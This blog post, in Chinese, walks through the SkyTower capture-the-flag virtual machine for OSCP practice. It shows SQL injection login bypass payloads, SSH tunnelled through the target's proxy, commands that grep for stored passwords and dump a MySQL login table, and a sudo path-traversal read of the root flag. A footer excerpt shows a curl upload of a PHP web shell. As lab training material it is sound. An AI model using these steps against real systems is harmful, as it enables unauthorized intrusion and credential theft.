首页 > 其他分享 >OSCP(扩展篇靶机SkyTower)

OSCP(扩展篇靶机SkyTower)

时间:2023-12-11 16:26:15浏览次数:26  
标签:bin SkyTower sudo 192.168 syntax 56.108 ssh 靶机 OSCP

第一步:nmap

 

 

第二步:SQL注入测试,获得john权限

e-mail:test'  password:test'

There was an error running the query [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'test''' at line 1]

对单引号有反应,首先尝试万能密码:     ' or 1=1 --    尝试

There was an error running the query [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '11 ' and password=' ' 11 '' at line 1]           

看来等号是没了,不过可以用 > <  <> 代替

使用intruder中的 pitchfork模块来暴力破解,这里发现出现了几种不同的字符,直接repeater中使用复制回显,这里发现绕过并成功显示用户名信息。

使用SQLi Payloads

Username: john
Password: hereisjohn

 

第三步:尝试使用代理链接ssh

无法直接ssh链接

proxychains使用方法

  1. 安装ProxyChains:在终端中输入命令sudo apt-get install proxychains4来安装ProxyChains。

  2. 修改配置文件:使用sudo vim /etc/proxychains.conf命令来打开配置文件,并在文件末尾加上代理服务器的地址。

vi /etc/proxychains4.conf

/ProxyList

http 192.168.56.108 3128

将http流量代理到目标主机 3128端口

保存之后,尝试使用代理登录目标主机

proxychains ssh [email protected]

 成功连接的同时被注销了会话,然而这样却可以执行

 我们直接proxychains4 ssh [email protected] /bin/bash

 

第四步:尝试寻找包含密码的文件

/bin/sh -i

 find / -maxdepth 4 -name *.php -type f 2>/dev/null | xargs grep -C20 -i pass     

 mysql用户名密码都是root,查看存在哪些数据库,查看SkyTech这个数据库

mysql -uroot -proot -e 'show databases;'

 mysql -uroot -proot -e 'use SkyTech; show tables;'

 mysql -uroot -proot -e 'use SkyTech; select * from login;'

 获得三个用户名密码

 

第五步:利用sara用户进行连接,通过sudo越权

proxychains4 ssh [email protected] /bin/bash

/bin/sh -i

 

发现对这个accounts的目录是有sudo权限的,但是我们无法sudo,因为我们没有ttyshell,我们可以看看bashrc文件,看看bash是如何设置为交互式运行的

 cat .bashrc,发现末尾有个退出

 我们直接把.bashrc删掉,再试试

 

 sudo cat /accounts/../root/flag.txt

可以目录遍历到拿取旗帜,root密码也在里面

 

获取root权限

 

 

完结撒花~

 

标签:bin,SkyTower,sudo,192.168,syntax,56.108,ssh,靶机,OSCP
From: https://www.cnblogs.com/justdoIT20680/p/17894682.html

相关文章

  • OSCP(扩展篇靶机SickOS1.2)
    第一步:nmap、nikto、dirb   第二步:利用curl实现文件上传http://192.168.107.149/test/检查一下是否发现了任何可用的可利用的http方法curl-v-XOPTIONShttp://192.168.107.149/test/ 包括了PUT用法让我们尝试上传shellcurl-v-XPUT-d'<?phpsystem($_GET......
  • OSCP(扩展篇靶机SickOS1.1)
    第一步:nmap和niktonikto:https://zhuanlan.zhihu.com/p/124246499 8080http-proxy我们是利用3128查看nikto是否存在可利用的漏洞nikto-h192.168.107.148--useproxy192.168.107.148:3128扫描目标时,部分目标部署了防护设备,为避免暴露ip可以使用代理进行扫描,nikto支持......
  • OSCP(提高篇靶机mrRobot)
    第一步:nmap与dirb   fsocity.dic这个可能是用户或者密码的字典,发现内部存在大量重复数据 catfsocity.dic|sort|uniq>fsocietyuniq 进入登录界面test/test登录 第二步:使用hydra进行用户名密码暴力破解Invalidusername不存在该用户名  F=不存在这......
  • OSCP(基础篇靶机Tr0ll 1)
    第一步:nmap 第二步:发现允许匿名访问(Anonymous/Anonymous)是pcap数据包文件,用tcpdump分析tcpdump用法详解:https://www.jianshu.com/p/1ff7f77e2718 sup3rs3cr3tdirlol访问http://192.168.107.145/sup3rs3cr3tdirlol得到roflmao 下载roflmaocd~/Downloadsfileroflma......
  • OSCP(基础篇靶机Kioptrix Level 3)
    第一步:nmap与dirb第二步:发现 ProudlyPoweredby:LotusCMS框架,尝试是否存在漏洞利用(失败) 漏洞分析与利用:https://www.youtube.com/watch?v=ZsQP94HHfeY该模块利用了LotusCMS3.0的Router()函数中发现的漏洞。这是通过在“page”参数中嵌入PHP代码来完成的,该参数......
  • Vulnhub-DevGuru-1(靶机玩乐2023-12-1_已完成)
    靶机下载地址:https://www.vulnhub.com/entry/devguru-1,620/第一步:NMAPmap-p--sV-sC-A192.168.177.131-oAnmap_devguru 扫描结果显示目标开放了22、80、8585端口  得到backend为OctoberCMS后台登录界面 第二步:.git源码泄露分析git信息泄露分析:https://g......
  • OSCP(提高篇靶机Stapler)
    第一步:netdiscover第二步:nmap   第三步:存在20/21ftp服务,先尝试一下匿名访问,看看有无有用信息(anonymous) 第四步,发现只是闲聊信息,下面看一下12380的web服务,并进行目录扫描,查看泄露目录robots.txtdirbhttps://192.168.107.143:12380  当然这里也可以使用:nikto-h......
  • OSCP(基础篇靶机Kioptrix Level 2)
    第一步:netdiscover加nmap 第二步:通过burpsuite,利用SQLiPayloads进行SQL注入SQLiPayloads:'-''''&''^''*''or''-''or''''or''&''or'&#......
  • OSCP(基础篇靶机Kioptrix Level 1)
    第一步:netdiscover-ieth0 第二步:nmap 第三步:139samba高危服务,先看看是啥版本,利用msfmsfconsoleuseauxiliary/scanner/smb/smb_version 第四步:Samba<2.2.8(Linux/BSD)-RemoteCodeExecution存在远程代码执行漏洞kali查看某个系统的漏洞工具:msfconsole->sear......
  • Vulnhub DomDom-1(靶机玩乐2023-11-30)
    靶机下载地址:https://www.vulnhub.com/entry/domdom-1,328/第一步:扫一下同网段接口IP: 第二步:nmap扫描版本端口详细信息并输出  第三步:访问80端口服务 第四步:简单做做dirb目录遍历,也可以安装gobuster等做目录扫描:https://blog.csdn.net/qq_22597955/article/details......